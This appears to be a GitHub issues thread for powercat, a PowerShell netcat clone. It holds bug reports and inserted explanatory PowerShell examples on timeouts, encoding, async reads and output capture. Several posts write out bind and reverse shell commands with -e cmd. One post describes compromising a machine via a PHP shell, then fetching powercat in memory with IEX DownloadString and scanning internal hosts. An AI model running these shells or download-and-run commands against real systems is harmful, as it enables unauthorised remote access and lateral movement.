besimorhino / powercat
netshell features all in version 2 powershell
License: Apache License 2.0
I'm doing an important basic test because this is the most useful use case for me. Its final use will be NAT bypass or NAT passthrough, whatever you like to call it :). The following tests have been performed on a basic LAN.
On Workstation A (Windows 7), I'm starting a client:
powercat -c 192.168.100.22 -p 8000 -r tcp:localhost:3389 -rep
Expected behavior: client must keep trying to connect to listener over and over again. At this point, a listener has not been started. So...
On Windows workstation B (Windows 8.1), at an arbitrary moment, I'm starting a listener:
Powercat -l -p 8000 -r tcp:3389
Goal here is that when I boot workstation B and start the listener, the client will connect successfully within 60 seconds. 60 seconds being the default timeout.
-t Timeout option. Default: 60 [int32]
-rep Repeater. Restart after disconnecting. [Switch]
I think the behavior of -rep might be different from what I expect. If so, is it possible to include this behavior as a feature?
many thanks,
Jeroen
I use the PowerShell command for downloading powercat; it says the script contains malicious content.
Maybe I'm missing something, but there appears to be no way to detect connection errors - no exception/error is thrown/written, and $? evaluates to True in the following situations:
Question, I was at the BSidesLV powercat talk. You were talking about an SSL enabled version that was just having issues with the server side stuff. I'd love to see about helping out with that; is there any chance you could put what you've worked on in a branch or something?
I'm trying powercat with -t 2 for a two second timeout and seeing 2 minutes. Actually I see a two minute timeout regardless of what I set -t to.
PS C:\Users\tfulmer> date;powercat -c 10.10.37.111 -p 22 -t 2;date
Thursday, February 23, 2017 3:22:40 PM
SSH-2.0-OpenSSH_7.1
Thursday, February 23, 2017 3:24:40 PM
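The two reports above (no error and $? staying True on a failed connection, and -t not shortening the two-minute connect timeout) share one cause: the TCP connect has to be given its own deadline and its outcome has to be surfaced to the caller. The following is an added example, not powercat's code or anything the posters wrote; the function name Connect-TcpWithTimeout is made up for this illustration. It uses BeginConnect/EndConnect so the timeout is enforced by WaitOne rather than by the socket's default, and reports failures through Write-Error so that $? is $false afterwards. Both targets are on loopback and constructed by the script itself, so it runs offline:

```powershell
# Added example (not from the powercat project): a TCP connect that honours a
# caller-supplied timeout and reports failure on the error stream, so a script
# can distinguish refused, timed-out and successful connections.

function Connect-TcpWithTimeout {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][int]$Port,
        [int]$TimeoutSeconds = 60
    )
    $client = New-Object System.Net.Sockets.TcpClient
    $async = $client.BeginConnect($ComputerName, $Port, $null, $null)
    # WaitOne returns $false if the deadline passes before the connect finishes;
    # closing the client aborts the pending attempt instead of leaving it hanging.
    if (-not $async.AsyncWaitHandle.WaitOne([TimeSpan]::FromSeconds($TimeoutSeconds))) {
        $client.Close()
        Write-Error "Connection to ${ComputerName}:$Port timed out after $TimeoutSeconds s"
        return $null
    }
    try {
        $client.EndConnect($async)   # throws SocketException on refusal, unreachable host, etc.
        return $client
    }
    catch {
        $client.Close()
        Write-Error "Connection to ${ComputerName}:$Port failed: $($_.Exception.Message)"
        return $null
    }
}

# Constructed targets on loopback.
# 1) A port with a listener behind it: connect succeeds and $? is True.
$listener = New-Object System.Net.Sockets.TcpListener([System.Net.IPAddress]::Loopback, 0)
$listener.Start()
$openPort = ([System.Net.IPEndPoint]$listener.LocalEndpoint).Port

$c  = Connect-TcpWithTimeout -ComputerName '127.0.0.1' -Port $openPort -TimeoutSeconds 2
$ok = $?
"open port {0}: connected={1} `$?={2}" -f $openPort, ($null -ne $c), $ok
if ($c) { $c.Close() }
$listener.Stop()

# 2) The same port with nothing listening: refused at once, $null returned, $? is False
#    (even with the error message suppressed).
$c  = Connect-TcpWithTimeout -ComputerName '127.0.0.1' -Port $openPort -TimeoutSeconds 2 -ErrorAction SilentlyContinue
$ok = $?
"closed port {0}: connected={1} `$?={2}" -f $openPort, ($null -ne $c), $ok
```

A host that silently drops SYNs (a firewalled address) exercises the WaitOne branch: the call returns after $TimeoutSeconds rather than after the operating system's own connect timeout, which is where the two minutes in the transcript above come from.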
When trying to install PowerCat directly using invoke-expression (IEX), I get the following error in Powershell 7:
Invoke-Expression: This script contains malicious content and has been blocked by your antivirus software.
I'm on Windows 10 with built-in Windows Defender.
Was curious if there was a bug transferring files. Our lab was a Windows 7 client (PowerShell 2.0) going to Server 2012 (PowerShell 4); we couldn't get it to transfer files. All other features worked great: got them talking, shells opened, but following the exact instructions (main page) we couldn't get the files to transfer.
Appreciate any suggestions, and great work on a super cool tool!!
We got ncat working in the same scenario but would really like to have the ability to use powercat as well.
For example:
powershell.exe -E 'xx.ps1'
Error: tells me it is not base64.
I know it is probably a UTF-16 format issue, but I want to know how to fix it. Thanks.
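The post above has the cause right: -EncodedCommand (-E) takes the Base64 of the script text encoded as UTF-16LE, not the Base64 of the file's bytes or a file name. The following is an added example, not powercat's code or the poster's; the function names ConvertTo-EncodedCommand and ConvertFrom-EncodedCommand are made up here. It shows the correct encoding beside the usual wrong one, and the decoder is the same thing an analyst runs on an encoded command line found in process-creation logs:

```powershell
# Added example (not from the powercat project): produce and decode the Base64
# that powershell.exe -EncodedCommand expects (UTF-16LE text, what .NET calls
# "Unicode"), and show why a UTF-8/ASCII encoding of the same text fails.

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$ScriptText)
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($ScriptText)   # UTF-16LE
    [System.Convert]::ToBase64String($bytes)
}

# Reverse direction: what you use when an -EncodedCommand value shows up in
# process-creation telemetry (e.g. Event ID 4688 or Sysmon event 1 command lines).
function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    $bytes = [System.Convert]::FromBase64String($Base64)
    [System.Text.Encoding]::Unicode.GetString($bytes)
}

# Constructed script text standing in for the contents of xx.ps1.
$script = 'Get-Date | Out-String'

$good    = ConvertTo-EncodedCommand -ScriptText $script
$decoded = ConvertFrom-EncodedCommand -Base64 $good
if ($decoded -ne $script) { throw 'round trip failed' }
"UTF-16LE encoding (what -E expects): $good"

# The common mistake: Base64 of the UTF-8/ASCII bytes. It is valid Base64, but
# read back as UTF-16LE it is no longer the script, so powershell.exe cannot run it.
$wrong = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($script))
"UTF-8 encoding (wrong):              $wrong"
"UTF-8 value decoded as UTF-16LE:     " + (ConvertFrom-EncodedCommand -Base64 $wrong)

# For a whole file, read it as one string first (-Raw) and encode that:
#   $enc = ConvertTo-EncodedCommand -ScriptText (Get-Content .\xx.ps1 -Raw)
#   powershell.exe -EncodedCommand $enc
```

Note that -E never takes a path: passing 'xx.ps1' hands the parameter the literal characters of the file name, which is why the error talks about Base64 rather than about a missing file.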
Perhaps I'm misunderstanding how to use this utility, but basically I'm looking for socat-like functionality, where I open a listener and it persists, listening for incoming data on the specified port. In socat it would be: socat TCP-LISTEN:6142,fork stdout, which in powercat I would think would be powercat -l -p 6142.
However, using this from a PS prompt, the socket is closed as I cannot telnet into it. How do you use this script so that it'll persist?
I am trying to connect to a dnscat2 server. I use the --security open setting; I assume that is correct, because I see no way to add a psk with powercat (yet!).
But I'm not getting a session. Any help on how to set this up would be great!
Got a little farther. I set a DNS domain on powercat and dnscat2 and it seems to connect.
I can enter a session now from dnscat back through, but I have no commands or shell access.
When trying to connect like so, all goes ok: telnet localhost 443
Then I type the letter d and immediately, I get an error:
PS H:\> d
IEX : The term 'd' is not recognized as the name of a cmdlet, function,
script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:172 char:61
try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExec
~~~~~~~~~~~~~~~~~~
PS H:\>
Installed PS version:
PS H:\> $PSVersionTable.PSVersion
Major  Minor  Build  Revision
-----  -----  -----  --------
3      0      -1     -1
Either this is a bug, or I'm doing something wrong :)
Some recommendations in style and functionality
The community and MS are working on a Style Guide and Best Practices guide: https://github.com/PoshCode/PowerShellPracticeAndStyle. I know I made the recommendations to the original author, but since I see it is being maintained by others now I thought I would repeat them :)
The bind shell powercat -l -p 4444 -e cmd.exe does not return a prompt until I press Up Arrow in the prompt running powercat.
This may be due to latency involved with an OpenVPN/rdesktop set-up, but this latency would likely be involved in operational use. I did not attempt to recreate locally to see if latency was a factor.
Replication:
In PowerShell:
powercat -v -l -p 4444 -e cmd.exe
The prompt will report: Listening on [0.0.0.0] (port 443)
On connecting device:
nc -nv 123.123.123.123 4444
After connecting, the connecting device displays:
(UNKNOWN) [123.123.123.123] 4444 (?) open
The bind device does not display the connection in the prompt, but the connection is visible in netstat.
In PowerShell Prompt:
<press up arrow>
The prompt will report Connection from [123.123.123.123] port [tcp] accepted (source port 5555)
and proceed as normal.
Hi,
I'm using powercat to achieve a remote shell and after this, execute a port scan over other machines that the infected machine has visibility of.
I'm executing the port scanning of powercat from memory using the following command:
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); (21,22,80,443) | % {powercat -c 172.16.11.33 -p $_ -t 1 -Verbose}
When I execute it, the remote shell disconnects and the result appears in the browser which was used to infect the machine via the PHP shell.
Why does it happen? How can I fix it?
Thanks!
If you open 2 copies of powercat pointing at each other, they sit there chewing through tons and tons of CPU, just bouncing around checking to see if there is anything to read. On my laptop, each copy pulls 10% of the CPU, and causes the fan to spin up. Not exactly "stealthy". It'd be a bit of a rewrite, but it looks like everything is already using AsyncResult stuff; if it built a list of all the AsyncResults, it could do a WaitOne on that list, and then recheck everything and loop. Wouldn't be as clean as a callback based method, but it would be much, much cleaner than currently.
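The approach the post suggests, in an added example that is not powercat's code and not the poster's: one outstanding BeginRead per stream, then a single blocking wait on the set of AsyncWaitHandles (WaitHandle.WaitAny, the multi-handle form of the WaitOne the poster mentions) instead of a loop that keeps asking each stream whether data is available. The function name Wait-AnyRead is invented for this illustration; both ends of the connection are created on loopback by the script, so it runs stand-alone:

```powershell
# Added example (not from the powercat project): block on a set of pending
# async reads with WaitHandle.WaitAny rather than polling them in a tight loop.

$listener = New-Object System.Net.Sockets.TcpListener([System.Net.IPAddress]::Loopback, 0)
$listener.Start()
$port = ([System.Net.IPEndPoint]$listener.LocalEndpoint).Port

# Constructed peers: a TcpClient on each end of one loopback connection.
$client = New-Object System.Net.Sockets.TcpClient
$client.Connect([System.Net.IPAddress]::Loopback, $port)
$server  = $listener.AcceptTcpClient()
$streams = @{ client = $client.GetStream(); server = $server.GetStream() }

# One outstanding BeginRead per stream; each IAsyncResult exposes a wait handle.
$names   = @('client', 'server')
$buffers = @{}
$reads   = @{}
foreach ($n in $names) {
    $buffers[$n] = New-Object byte[] 4096
    $reads[$n]   = $streams[$n].BeginRead($buffers[$n], 0, 4096, $null, $null)
}

function Wait-AnyRead {
    # Returns the name of the first stream whose read completed, or $null on timeout.
    param([string[]]$Names, [hashtable]$Reads, [int]$TimeoutMs)
    $handles = [System.Threading.WaitHandle[]]@($Names | ForEach-Object { $Reads[$_].AsyncWaitHandle })
    $i = [System.Threading.WaitHandle]::WaitAny($handles, $TimeoutMs)
    if ($i -eq [System.Threading.WaitHandle]::WaitTimeout) { return $null }
    return $Names[$i]
}

# 1) Nothing sent yet: the thread sleeps in the kernel for the whole timeout,
#    burning no CPU, instead of spinning on DataAvailable checks.
$sw    = [System.Diagnostics.Stopwatch]::StartNew()
$ready = Wait-AnyRead -Names $names -Reads $reads -TimeoutMs 500
$label = if ($ready) { $ready } else { '<none>' }
"After {0} ms, ready stream: {1}" -f $sw.ElapsedMilliseconds, $label

# 2) The client writes; WaitAny returns as soon as the server's read completes.
$payload = [System.Text.Encoding]::ASCII.GetBytes("hello from client`n")
$streams['client'].Write($payload, 0, $payload.Length)
$ready = Wait-AnyRead -Names $names -Reads $reads -TimeoutMs 5000
$count = $streams[$ready].EndRead($reads[$ready])
$text  = [System.Text.Encoding]::ASCII.GetString($buffers[$ready], 0, $count).TrimEnd()
"Stream '{0}' received {1} bytes: {2}" -f $ready, $count, $text

# In a relay loop you would forward the bytes, re-issue BeginRead on the stream
# that fired, and wait again; the other stream's pending read is untouched.

$client.Close(); $server.Close(); $listener.Stop()
```

Besides the CPU cost, a polling relay has a detection side effect worth knowing about: a process that is constantly busy while its sockets are idle stands out in per-process CPU telemetry, which is what the "not exactly stealthy" remark above is getting at.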
Hi,
I set up a listener, "nc -l -p 443", then attempted to connect using powercat. The following command works successfully, "powercat -c 192.168.1.181 -p 443 -e cmd"; however, using PowerShell mode, "powercat -c 192.168.1.181 -p 443 -ep", the connection is unsuccessful and causes both sides of the connection to exit (even nc on Kali crashes).
Enabling verbose output, the following is captured:
PS C:\> Import-Module D:\GIT\Kieran-GitHub\powercat\powercat.ps1
PS C:\> powercat -c 192.168.1.181 -p 443 -ep -Verbose
VERBOSE: Set Stream 1: TCP
VERBOSE: Set Stream 2: Powershell
VERBOSE: Setting up Stream 1... (ESC/CTRL to exit)
VERBOSE: Connecting...
VERBOSE: Connection to 192.168.1.181:443 [tcp] succeeeded!
VERBOSE: Setting up Stream 2... (ESC/CTRL to exit)
VERBOSE: Stream 2 Setup Failure
VERBOSE: Closing Stream 1...
PS C:\>
I spent a few hours looking through the code, adding some additional debug outputs etc. I also reviewed your change log from the past few commits.
The cause for Stream 2 setup to fail is that $Encoding has not been defined. It appears that the line
$Encoding = New-Object System.Text.AsciiEncoding
has been removed during some of the code re-factoring. This should be reintroduced as follows:
param($Stream1SetupVars)
try
{
    $Encoding = New-Object System.Text.AsciiEncoding
    [byte[]]$InputToWrite = @()
    if($i -ne $null)
I have also made an additional update to my fork, changing the way that the $CommandToExecute variable is executed by Invoke-Expression (IEX). The code in question is:
##### Stream2 Read #####
$Prompt = $null
$ReturnedData = $null
if($CommandToExecute -ne "")
{
    try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExecute 2>&1 | Out-String))}
    catch{}
    $Prompt = $Encoding.GetBytes(("PS " + (pwd).Path + "> "))
}
Previously only default output was captured and sent back to the listener, this created two side effects.
Firstly, any information displayed via the Write-Error, Write-Verbose, Write-Debug or Write-Warning cmdlets will not get sent from the client back to the listener machine. This can be easily achieved by implementing redirection of 3>, 4> and 5> (along with 2>) to stream 1.
Secondly, if you didn't correctly type the command you wanted to run, no output was received. If you typed a CMDLet incorrectly, say resolve-dns instead of resolve-dnsname, you would receive no feedback. This can be easily resolved by setting the returned bytes to be that of the $error variable, this can be achieved by updating the catch portion (which is currently empty).
The updated code block would be
##### Stream2 Read #####
$Prompt = $null
$ReturnedData = $null
if($CommandToExecute -ne "")
{
    try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExecute 2>&1 3>&1 4>&1 5>&1 | Out-String))}
    catch{[byte[]]$ReturnedData = $Encoding.GetBytes(($_ | Out-String))}
    $Prompt = $Encoding.GetBytes(("PS " + (pwd).Path + "> "))
}
I will generate a pull request for you to merge these fixes and updates in, I have tagged the fixes as https://github.com/kjacobsen/powercat/tree/Powercat-EPIssue
Would it also be OK if I spent some time cleaning up this code standardizing this towards PowerShell best practices? I would really like to help putting in additional comments, error handling and more standardization.
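The capture logic from the post above, isolated so it can be exercised without a socket, as an added example that is not powercat's code and not the poster's. The function name Invoke-CapturedCommand and the sample commands are made up for this illustration. It shows what each of the extra redirections contributes (3 = warning, 4 = verbose, 5 = debug, alongside 2 = error) and how the non-empty catch turns a terminating error such as a mistyped cmdlet name into text instead of silence:

```powershell
# Added example (not from the powercat project): run a command string, merge
# its success, error, warning, verbose and debug streams into one string, and
# render a terminating error as text so the remote end always gets feedback.

function Invoke-CapturedCommand {
    param([Parameter(Mandatory)][string]$CommandToExecute)
    $Encoding = New-Object System.Text.AsciiEncoding   # the line the post says went missing
    try {
        [byte[]]$ReturnedData = $Encoding.GetBytes((Invoke-Expression $CommandToExecute 2>&1 3>&1 4>&1 5>&1 | Out-String))
    }
    catch {
        # Terminating errors (e.g. CommandNotFoundException for a mistyped name)
        # never reach the pipeline, so without this branch they vanish.
        [byte[]]$ReturnedData = $Encoding.GetBytes(($_ | Out-String))
    }
    $Prompt = $Encoding.GetBytes(("PS " + (Get-Location).Path + "> "))
    # What the peer would receive: the output followed by a fresh prompt.
    return ($Encoding.GetString($ReturnedData) + $Encoding.GetString($Prompt))
}

# Verbose and debug records are only produced when the preference variables
# allow it, so 4>&1 and 5>&1 capture nothing unless these are set.
$VerbosePreference = 'Continue'
$DebugPreference   = 'Continue'

# Constructed commands, one per stream plus the mistyped-cmdlet case.
$samples = @(
    "'a success-stream line'",
    "Write-Warning 'a warning'",
    "Write-Verbose 'verbose detail'",
    "Write-Debug 'debug detail'",
    "Write-Error 'a non-terminating error'",
    "resolve-dns example.invalid"      # not a real cmdlet: lands in the catch block
)

foreach ($cmd in $samples) {
    "--- $cmd"
    Invoke-CapturedCommand -CommandToExecute $cmd
}
```

On the monitoring side, everything this function runs still passes through Invoke-Expression, so PowerShell script block logging (event 4104) records each command string regardless of which streams are relayed back over the socket.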
Hi,
Can you document explicitly under which license you are distributing your code?
(Without explicit mention, all rights are reserved.)
You could add a LICENSE file or add an explicit mention in the README.md.
Thanks
Please add a LICENSE with your copyright notice. I am interested in using your software for testing. It will come in handy because there is no simple UDP listener that ships with Microsoft Windows (R). We always have to write one to test UDP connectivity. Almost all *nix operating systems come with OpenBSD-netcat or netcat-traditional. Thank you very much.
I get the following error if I pipe a message to powercat
> 'aaaaa' | powercat -c localhost -p 5514 -u
IEX : You cannot call a method on a null-valued expression.
At \\psf\home\Projects\powercat\powercat.ps1:932 char:18
+ $Output += IEX $InvokeString
+ ~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [Invoke-Expression], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull,Microsoft.PowerShell.Commands.InvokeExpressionCommand